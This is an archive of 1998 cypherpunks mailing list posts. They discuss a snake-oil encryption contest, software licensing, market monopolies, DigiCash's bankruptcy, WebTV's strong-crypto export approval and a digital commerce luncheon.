>Date: Wed, 03 Jun 1998 14:41:24 -0500
>To: SpyKing <spyking@con2.com>
>In-Reply-To: <3.0.3.32.19980601033850.0355c350@admin.con2.com>
>Subject: POST RE: $5,000,000 Encryption contest

-----BEGIN PGP SIGNED MESSAGE-----

In <3.0.3.32.19980601033850.0355c350@admin.con2.com>, on 06/01/98 
   at 02:38 AM, SpyKing <spyking@con2.com> said:

>15)From: SpyKing@thecodex.com
>Subject: $5,000,000 "Break the Code" Encryption Contest

>Friday May 29, 3:00 pm Eastern Time
>Company Press Release
>SOURCE: JAWS Technologies Inc.

>JAWS Launches $5,000,000 ``Break the Code'' Encryption Contest


<sigh> Yet another Snake-oil post.

Such challenges like this are really meaningless and are designed as a
publicity stunt to gain some free press rather than as a legitimate test
of the strength of the algorithms involved.

The *only* way to test the security of an algorithm is through a process
of peer-review of the source code.

Until JAWS Technologies decides to go through this process I would stay
far away from this and any other products they may produce. It seems quite
clear that they have little to no understanding of the cryptology &
security fields.

I don't know what it is about the list but it seems that we must endure
these snake-oil posts on a periodic basis.

While I have replied here to many of these snake-oil advertisements I have
yet to see one of these companies post a rebuttal (to the list or
privately).

I have submitted a copy of the Snake-Oil FAQ to SpyKing requesting that he
publish it to the list (it's a little long so I don't want to post it
directly). It can also be found at:

http://www.interhack.net/people/cmcurtin/snake-oil-faq.html

Security & Encryption are the big buzz-words in the computer industry and
many companies are looking to cash-in on it. Be very wary of Johnny Come
Lately's who overnight become cryptology "experts".


- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: I love running Windows! NOT!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNXNVXo9Co1n+aLhhAQHr5gP/aghoKztlVP6EjX0FU2v5rkBdu5FbyEWR
6aR/DdOvVYphIIQMk1O1Twy7ZasVUW/dSBPl7uT1/6yfw/NzSonyztmw+WR5d4lg
rWOZ8Y1JjbXvLzH3RzA+LXZbShZ/Z5Smdb0yybvldHogo8pYDNeeJ5ZtMJuSgYfI
VkoA4SFBDoY=
=0m9E
-----END PGP SIGNATURE-----
 
Tag-O-Matic: You're throwing it all out the Windows!

-----------------------------------------------------
 -- End of forwarded message
-----------------------------------------------------
 
Tag-O-Matic: If at first you don't succeed, work for Microsoft.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 6 Oct 1998 07:20:20 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810062119.QAA09408@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)
> Date: Tue, 6 Oct 1998 13:20:41 -0700 

> The only problem is your statement that one can dominate "saturable"
> markets without some artificial "mechanism."

Who said anything about 'artificial'? You have a sneaky habit of sticking
terms in there where they don't go hoping somebody won't catch it. We're
talking a free-market, there are *only* two participants; provider and
consumer. If I allow 'artificial' in there then there is the explicit
assumption that a third party is now involved. I won't accept a
bastardization of free-market in that manner.

If you want to expand your argument by the injection of these spurious terms
(they aren't relevant to my argument) feel free. Be warned I will continue
to point out the distinction vis-a-vis the impact on conclusions.

> If you mean dominate by
> market share, then sure that is possible.

I mean *dominate* the market. Quit sticking extra terms in there trying 
to subtly change the meaning. I promise you I will notice so you can quit
now.

> ALCOA dominated via low prices and high efficiency. Domination in the
> bad sense is to be immune from the laws of supply and demand, and hence
> have arbitrary power over the market -- that is the definition of a
> coercive monopoly.

No, that is the definition of monopoly. Now what and how they got and retain
that position may invoke coercion but it *isn't* a requirement for
monoplies by definition. Don't try to confuse method with type.

> You will find that that is not possible without an
> artificial barrier to competition.

Demonstrate please. The problem with this view is that it implies that given
sufficient time *any* market strategy will fail. In other words there is no
best or efficient strategy for a given market. In the past when this has
been brought up I've asked for an explanation of how this dynamic works and
specificaly what prevents such best-of-breed examples from existing.

I'm still waiting for such an explanation.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Tue, 6 Oct 1998 09:34:40 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A28@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> > The only problem is your statement that one can dominate 
> > "saturable" markets without some artificial "mechanism."
> 
> Who said anything about 'artificial'?

I did. I state you cannot have a coercive monopoly without artificial
barriers (and hence a free market cannot have a coercive monopoly) and
you disagree. I am not sticking any terms where they don't go, you have
consistently theorized monopolies can exist in a free market.

Perhaps you should re-read my statement and not assume negatives where I
clearly did not write them.

> talking a free-market, there are *only* two participants;

That is a twisted and absolutely unjustified definition of a free
market. A free market lacks forceful restriction or prohibition of free
[consensual] trade. 

EXCEPT that which violates individual rights. I will argue that an
anarcho-capitalist market that treats force as a commodity is NOT a free
market.

There can be participants acting as agents, intermediaries and arbiters
for the traders.

> > If you mean dominate by
> > market share, then sure that is possible.
> 
> I mean *dominate* the market.

You cannot define a word with itself. What is *dominate* in context of a
market, and does that dominance imply the possession of arbitrary power?

> > have arbitrary power over the market -- that is the 
> > definition of a coercive monopoly.
> 
> No, that is the definition of monopoly.

The only valid definition, yes. I will gladly accept the invalidation
that dominant or exclusive market share necessarily constitute a
monopoly, as that does not in itself prove arbitrary power (immunity
from market economics).

> > You will find that that is not possible without an
> > artificial barrier to competition.
> 
> Demonstrate please. The problem with this view is that it 
> implies that given sufficient time *any* market strategy 
> will fail. In other words there is no best or efficient 
> strategy for a given market.

There is but ONE market strategy: to price at a point lower than new
entrants could sustain their business, and constantly increase
productive efficiency and reduce costs.

This works great in the short term, especially in emerging industries,
but it is statistically improbable for a company to maintain perfection.
The market is not static, it is always changing and technology often
favors new entrants who are not encumbered with legacy technology.

It is less relevant that such a company is unlikely to maintain that
position forever, but that such efficient dominance is good for the
market. Productive efficiency raises the standard of living.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 6 Oct 1998 07:20:35 +0800
To: Digital Bearer Settlement List <cypherpunks@cyberpass.net
Subject: Sad news ... (... or not ;-))
Message-ID: <v0401175cb2402dd94896@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: Somebody
Date: Tue, 06 Oct 1998 18:02:28 +0100
To: Robert Hettinga <rah@shipwright.com>
Subject: Sad news ...
Mime-Version: 1.0

Hi Bob,

I figured you might be interested in today's news: DigiCash Amsterdam has
officially gone bankrupt.

Even though anyone can access the news (although probably not yet in
electronic
form), I'd appreciate if you don't mention me as being the one who told you
this.
I take it that the details will be brought to light in the coming few weeks.

Anyway, I believe this is very bad news for all those who believe in "bearer
certificates" or whatever one might like to call them.

<Somebody's .sig>
--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 6 Oct 1998 07:38:57 +0800
To: David Honig <honig@sprynet.com>
Subject: Re: Web TV with 128b exported
In-Reply-To: <3.0.5.32.19981006110801.0088a430@m7.sprynet.com>
Message-ID: <199810062125.RAA26914@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <3.0.5.32.19981006110801.0088a430@m7.sprynet.com>, on 10/06/98 
   at 11:08 AM, David Honig <honig@sprynet.com> said:

>http://biz.yahoo.com/prnews/981005/ca_microso_1.html

>MOUNTAIN VIEW, Calif., Oct. 5 /PRNewswire/ -- Microsoft Corp.'s (Nasdaq:
>MSFT - news) WebTV Networks today announced it is the first U.S. company
>to obtain government approval to export nonkey recovery-based
>128-bit-strength encryption for general commercial use. WebTV Networks
>pioneered low-cost access to the Internet, e-mail, financial services and
>electronic shopping through a television set and a standard phone line. 

>The WebTV(TM) Network service, combined with the WebTV-based Internet
>terminals and receivers, is the first communications system permitted by
>the U.S. government to provide strong encryption for general use by
>non-U.S. citizens in Japan and the United Kingdom. Such strong encryption
>allows Japanese and United Kingdom subscribers of WebTV to communicate
>through the WebTV Network (both within national borders and
>internationally) without fear of interception by unauthorized parties. 

I have my doubts on this. I find it highly unlikely that the FEDs would
approve this without some form of GAK built in even if it is not in the
form of "key recovery".

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Walk through doors, don't crawl through Windows.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNhqM149Co1n+aLhhAQH6QgQAwbLSHKbvSQATd9faLKGGhijUdwykD39R
pR4TUPBEEw8xZ8ueQBgNkh27Y6jUq3B+m6UuZlcrfMUHtCfHC69l0rE9zSpDVB+U
5zfGgapezqFOw6uy/Mma01WGtZcAjBH92xWT+iHP3VZyWavKU9f93HInup3rVOVZ
bXbhoTW5nvk=
=2xNs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Stallman <rms@santafe.edu>
Date: Tue, 6 Oct 1998 09:10:55 +0800
To: rick@campbellcentral.org
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199810051105.HAA13894@germs.dyn.ml.org>
Message-ID: <199810062305.RAA29198@wijiji.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain



      I may wish to write some code for free, that
    is, have the intention of letting you use my source code in your
    programs, and to write other code for profit.

Please separate the issues of freedom and price.  I think you are
lumping them together.  A number of people these days write free
software for profit; there are companies whose business is based on
developing free software, and all the software they develop is free.
See http://www.gnu.org/philosophy/selling.html for more about these
issues.

    I would vastly prefer that people simply place their code in the
    public domain explicitly.

If you want to use our code in non-free software, and leave your users
(who would then be our users also) no freedom, it is understandable
that you would ask for this.  But if we care about their freedom, as
well as about your freedom, it is natural that we would say no.

I've heard many people say that the X11 license is "more free" than
the GNU GPL.  Implicit in that is an assumption that you should
measure the freedom where the program leaves the hands of the original
developer.  But that doesn't measure the *users'* freedom.

If you measure the freedom where the program reaches the end user, you
find that the GPL results in more freedom for the users, because it
protects the users' freedom.  The X11 and BSD licenses have failed to
do that.  A large fraction of the users of X11 are running proprietary
modified versions; for them, X11 has very little freedom.  The same
was true of BSD--most of its users were running the proprietary
systems SunOS 4 and Ultrix.  (Maybe that is still true.)

See http://www.gnu.org/philosophy/x.html for more explanation.

But if you do decide to use a non-copyleft free license, please don't
use the BSD license.  Please use the X11 license, or some other that
is free of special problems.  See
http://www.gnu.org/philosophy/bsd.html for an explanation.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Stallman <rms@santafe.edu>
Date: Tue, 6 Oct 1998 09:11:27 +0800
To: schneier@counterpane.com
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199810051105.HAA13894@germs.dyn.ml.org>
Message-ID: <199810062306.RAA29216@wijiji.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain



    >The two have different goals. RMS is mistaken about appropriate
    >licensing for crypto code written by cypherpunks because he thinks the
    >goals are the same, when they are not.

I beg your pardon, but this is no mistake.  I'm well aware of the
people who argue for donating code to companies "so it will be more
widely used."  Proprietary software developers have been seeking for
years to convince free software developers to think this way, and not
just in the field of encryption.  This is what the X Consortium used
to say (see http://www.gnu.org/philosophy/x.html).

If you care about freedom, there's no reason why you can't care about
users' freedom to share and change software, and their freedom to use
encryption, at the same time.  You can work to spread use of
encryption and to spread users' freedom, at the same time, by
developing free encryption software.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 6 Oct 1998 07:19:46 +0800
To: cypherpunks@cyberpass.net, e$@vmeng.com
Subject: FINAL REMINDER: DCS-NY: October 13 Meeting: Stu Feldman of IBM
Message-ID: <v04011762b240377c8c8f@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


To: "recipient list suppressed" <perry@piermont.com>
Subject: FINAL REMINDER: DCS-NY: October 13 Meeting: Stu Feldman of IBM
Reply-To: dcs-ny-rsvp@piermont.com
Mime-Version: 1.0 (generated by tm-edit 7.108)
From: "Perry E. Metzger" <perry@piermont.com>
Date: 06 Oct 1998 15:03:08 -0400
Lines: 105
Sender: owner-cryptography@c2.net


[If you know of people who may be interested in this meeting, please
feel free to forward this message to them.]

FINAL REMINDER:

The second luncheon meeting of the Digital Commerce Society of New
York (DCS-NY), will be held on Tuesday, October 13th at 12:00. If you
are interested in attending, please RSVP and send in your check (as
explained below) IMMEDIATELY. If we don't _receive_ your check by
Friday, we cannot guarantee that we can seat you. (Normally I wouldn't
be sending out a reminder this late, but we've had a large influx of
inquiries in the last 24 hours.)

This Month's Luncheon Speaker:

 Stuart Feldman, IBM Institute for Advanced Commerce, IBM T.J.
 Watson Research Center

 Topic: Future Directions in Electronic Commerce

 Stuart Feldman will delve into a half dozen major themes for long-term
 research in electronic commerce. These areas will take years to resolve
 at a research level and even longer to achieve full impact in the world
 economy. They include privacy, the evolving marketplace on several time
 scales, the rise of dynamic businesses and electronic haggling, improved
 relationships to customers, and the systems underpinnings needed to
 support the vast new opportunities and capabilities of electronic
 commerce. Stuart Feldman is Director of IBM's Institute for Advanced
 Commerce. The Institute is dedicated to creating new technologies for
 support of e-commerce as well as pursuing fundamental issues in
 e-commerce. He is also the author of the original "make" and "f77."


WHAT IS DCS-NY?

As some of you probably know, Robert Hettinga has been running a group
called the Digital Commerce Society of Boston for over three years.
DCSB meets once a month for lunch at the Harvard Club in Boston to
hear a speaker and discuss the implications of rapidly emerging
internet and cryptographic technologies on finance and commerce --
"Digital Commerce", in short.

The Digital Commerce Society of New York (DCS-NY) is a spin-off of
DCSB.  We intend to meet the second Tuesday of each month for lunch
at the Harvard Club in New York, and conduct meetings much like those
of DCSB. Our organizing meeting in September was attended by a wide
variety of professionals involved in the business, technical and legal
sides of the emerging world of digital commerce.

If you are interested in attending our next luncheon meeting, please
follow the directions located below. If you merely wish to be added to
our e-mail meeting announcements list, you may send your e-mail
address to "dcs-ny-rsvp@piermont.com".


Perry

PS We would like to thank John McCormack for his invaluable assistance in
procuring the venue for our meetings.

----------------------------------------------------------------------

HOW TO RSVP:

The meeting will start at 12:00 noon on October 13th at the Harvard Club,
which located at 27 West 44th St. in Manhattan.

The cost of the luncheon is $49.00.

To RSVP, please:
A) Send a check for $49.00 (payable to "The Harvard Club of New York") to:

	Harry S. Hawk
	DCS-NY LUNCHEON
	Piermont Information Systems, Inc.
	175 Adams St., #9G
	Brooklyn, New York  11201

Please include along with your check:
1) The name of the person attending
2) Their daytime phone number
3) Their e-mail address

B) Send an email message to dcs-ny-rsvp@piermont.com indicating that
you have sent your check, so that we can inform the Harvard Club of
the number of people who will be attending.

Please note that the Harvard Club dress code requires jacket and tie
for men and comparable attire for women.

If you have special dietary requirements, please check with us by
email before you RSVP.

Making final arrangements for our room requires that we have a good
idea of how many attendees we will have. Because of this, it is very
important that you RSVP quickly so that we will be able to get a
larger room if necessary.

We are looking forward to seeing you!

----------------------------------------------------------------------


Perry

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 6 Oct 1998 08:17:47 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Web TV with 128b exported
In-Reply-To: <3.0.5.32.19981006110801.0088a430@m7.sprynet.com>
Message-ID: <v04011763b24038cadb34@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:08 PM -0400 on 10/6/98, David Honig wrote:


> http://biz.yahoo.com/prnews/981005/ca_microso_1.html
>
> MOUNTAIN VIEW, Calif., Oct. 5 /PRNewswire/ -- Microsoft Corp.'s (Nasdaq:
> MSFT - news) WebTV Networks today announced it is the first U.S. company to
> obtain government approval to export nonkey recovery-based 128-bit-strength
> encryption for general commercial use.

Looks like all of those clandestine visits that BillG, um, paid, to BillC
in Martha's Vinyard the last couple of summers finally, um, paid off?

Nawwwwwww...

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 6 Oct 1998 08:30:23 +0800
To: SDN <sdn@divcom.slimy.com>
Subject: Re: Web TV with 128b exported
In-Reply-To: <19981006151326.A7421@divcom.slimy.com>
Message-ID: <199810062222.SAA27925@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <19981006151326.A7421@divcom.slimy.com>, on 10/06/98 
   at 03:13 PM, SDN <sdn@divcom.slimy.com> said:

>It's probably as good as or better than any other Microsoft crypto,
>though.

That's not really saying much ...

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2: Windows done RIGHT!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNhqaVo9Co1n+aLhhAQFxnAP+JTSoJh91kvTr2c6HLinj5fENlvZn7lQV
R0LEg4EBDiahlPSjIvWgNdNBJMJnIAPv04Y4g7SvorXTfIl/okT7H7QN0YTGHHnP
DkJYMknLxJtNCQ3fOSPpBPcmEA4zwVVq8pJOcmeXqsLCyajqfm7hEM4AIGgDV9vR
dH21juYhpXM=
=bJkv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 6 Oct 1998 09:03:31 +0800
To: Cypherpunks Distributed Remailer <cypherpunks@einstein.ssz.com>
Subject: Re: Another potential flaw in current economic theory... (fwd)
In-Reply-To: <199810061803.NAA08378@einstein.ssz.com>
Message-ID: <v04011701b2404f900352@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:35 PM -0500 10/6/98, Steve Mynott wrote:
>any true cypherpunk must be a libertarian..


	Libertarians are just cowardly anarchists, they lack the courage of
their convictions to take the last step and eliminate government
altogether.
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 6 Oct 1998 09:07:00 +0800
To: Robert Hettinga <cypherpunks@cyberpass.net
Subject: Re: Sad news ... (... or not ;-))
In-Reply-To: <v0401175cb2402dd94896@[139.167.130.249]>
Message-ID: <v04011702b24050773983@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:30 PM -0500 10/6/98, Robert Hettinga wrote:
>--- begin forwarded text
>From: Somebody
>Date: Tue, 06 Oct 1998 18:02:28 +0100
>To: Robert Hettinga <rah@shipwright.com>
>Subject: Sad news ...
>Mime-Version: 1.0
>I figured you might be interested in today's news: DigiCash Amsterdam has
>officially gone bankrupt.

>Even though anyone can access the news (although probably not yet in
>electronic
>form), I'd appreciate if you don't mention me as being the one who told you
>this.
>I take it that the details will be brought to light in the coming few weeks.

>Anyway, I believe this is very bad news for all those who believe in "bearer
>certificates" or whatever one might like to call them.

	Then again, maybe it won't be.

	Who owns the patents, Digicash, or Chaum?

	If it's digicash, who will buy the rights to it, and what would
"they" do with that technology.
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 6 Oct 1998 09:27:50 +0800
To: cypherpunks@toad.com
Subject: Re: Web TV with 128b exported
In-Reply-To: <3.0.5.32.19981006110801.0088a430@m7.sprynet.com>
Message-ID: <v04011703b24051dc8d6e@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:32 PM -0500 10/6/98, William H. Geiger III wrote:
>   at 11:08 AM, David Honig <honig@sprynet.com> said:
>
>>http://biz.yahoo.com/prnews/981005/ca_microso_1.html
>
>>MOUNTAIN VIEW, Calif., Oct. 5 /PRNewswire/ -- Microsoft Corp.'s (Nasdaq:
>>MSFT - news) WebTV Networks today announced it is the first U.S. company
>>to obtain government approval to export nonkey recovery-based
>>128-bit-strength encryption for general commercial use. WebTV Networks
>>pioneered low-cost access to the Internet, e-mail, financial services and
>>electronic shopping through a television set and a standard phone line.
>
>>The WebTV(TM) Network service, combined with the WebTV-based Internet
>>terminals and receivers, is the first communications system permitted by
>>the U.S. government to provide strong encryption for general use by
>>non-U.S. citizens in Japan and the United Kingdom. Such strong encryption
>>allows Japanese and United Kingdom subscribers of WebTV to communicate
>>through the WebTV Network (both within national borders and
>>internationally) without fear of interception by unauthorized parties.
>
>I have my doubts on this. I find it highly unlikely that the FEDs would
>approve this without some form of GAK built in even if it is not in the
>form of "key recovery".

	I don't. If the chinese can buy access to strong Crypto, then Gates
& Crew can get permission to export SSL enabled browsers.
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 6 Oct 1998 09:37:58 +0800
To: Petro <petro@playboy.com>
Subject: Re: Another potential flaw in current economic theory... (fwd)
In-Reply-To: <v04011701b2404f900352@[206.189.103.244]>
Message-ID: <199810062329.TAA28931@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <v04011701b2404f900352@[206.189.103.244]>, on 10/06/98 
   at 05:53 PM, Petro <petro@playboy.com> said:

>At 2:35 PM -0500 10/6/98, Steve Mynott wrote:
>>any true cypherpunk must be a libertarian..


>	Libertarians are just cowardly anarchists, they lack the courage of
>their convictions to take the last step and eliminate government
>altogether.

Libertarians are well aware of the need for government, they are also
aware of the dangers to personal freedom that governments represent. The
goal of the Libertarians is to provide a system that minimizes government
and maximizes personal freedom. In the US this system takes the form of a
Constitutionally limited government (ie: the US Constitution interpreted
as a limiting document not an enabling one).

Anarchism does not work. It is a pipe dream much like Communism that only
leads to Totalitarianism.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: How do you make Windows faster?  Throw it harder!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNhqqCI9Co1n+aLhhAQE9iAP/frmPXAA1ayjsqmoOHvwEeAYRfG4GYegR
j87tY3l6NXS9qMlz8wOXcSx78EuDRMT9lK9D4FVRKaEk7xFNjIoAjU9h/BpKOugz
HYHOKDnfMo0UtE5WBcTBC9zGYjY0hZL4TquI8ymMe0UmQcUURkvBDg7VGJcI/VIR
cH23D1zyHgg=
=wFge
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Tue, 6 Oct 1998 10:26:59 +0800
To: me <me@myplace.to>
Subject: RE: I thought of an initialy regulated industry!... (fwd)
In-Reply-To: <3.0.1.32.19981005124212.00a094c0@mail.ewol.com>
Message-ID: <Pine.SOL.3.96.981006191624.1914D-100000@cavern.uark.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 5 Oct 1998, me wrote:

> The above concept is embraced by a vast number of the planets population
> and illustrates the ability of rationality to control perception.

The shorthand presently in vogue is "compartmentalization." 
We used to call it cognitive disonance.  Seems to this observer
that both sides of this thread are deep into it.  I stay on this
list because, just maybe, one of these days, one of you guys 
is gonna crack the code of anarchy v. contract enforcement.  Until
then, it's cogdis.
MacN




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 6 Oct 1998 10:44:12 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: I thought of an initialy regulated industry!... (fwd)
Message-ID: <199810070043.TAA11010@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 6 Oct 1998 19:22:31 -0500 (CDT)
> From: Mac Norton <mnorton@cavern.uark.edu>
> Subject: RE: I thought of an initialy regulated industry!... (fwd)

> that both sides of this thread are deep into it.  I stay on this
> list because, just maybe, one of these days, one of you guys 
> is gonna crack the code of anarchy v. contract enforcement.  Until
> then, it's cogdis.

What makes you thing anarchy eliminates contracts and the concomitent need
for enforcement?

The question is: "Who does the contract enforcement and arbitrage?"


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rod Munch <0wned@i.own.playboy.net>
Date: Tue, 6 Oct 1998 13:05:29 +0800
To: cypherpunks@toad.com
Subject: Netscape e-mail 128 bit Encryption
Message-ID: <361AD5E9.7D70@i.own.playboy.net>
MIME-Version: 1.0
Content-Type: text/plain



I just wantid to know if there is any to Crack The Encryption in 
Netscapes e-mail program for sending messages cause my computer teacher 
thinks hes all big and bad cause no one can read his shit so i want to 
show him up.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 6 Oct 1998 10:17:51 +0800
To: Petro <cypherpunks@cyberpass.net
Subject: Re: Sad news ... (... or not ;-))
In-Reply-To: <v0401175cb2402dd94896@[139.167.130.249]>
Message-ID: <v04011767b2405e63b20b@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:57 PM -0400 on 10/6/98, Petro wrote:

> 	Who owns the patents, Digicash, or Chaum?

DigiCash, Inc., of the US of A, not DigiCash BV, of the Netherlands.

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Glave <james@wired.com>
Date: Tue, 6 Oct 1998 13:04:13 +0800
To: Information Security <guy@panix.com>
Subject: Re: Web TV with 128b exported
In-Reply-To: <199810070119.VAA23135@panix7.panix.com>
Message-ID: <199810070258.TAA00770@hardly.hotwired.com>
MIME-Version: 1.0
Content-Type: text/plain



>#   http://biz.yahoo.com/prnews/981005/ca_microso_1.html
>#   
>#   William Reinsch, U.S.  undersecretary for export administration:
>#   ``The WebTV Network provides secure communications for its
>#   customers and partners without posing undue risks to
>#   national security and law enforcement.'' 
>
>Either it is interceptable and decodable or it isn't.
>
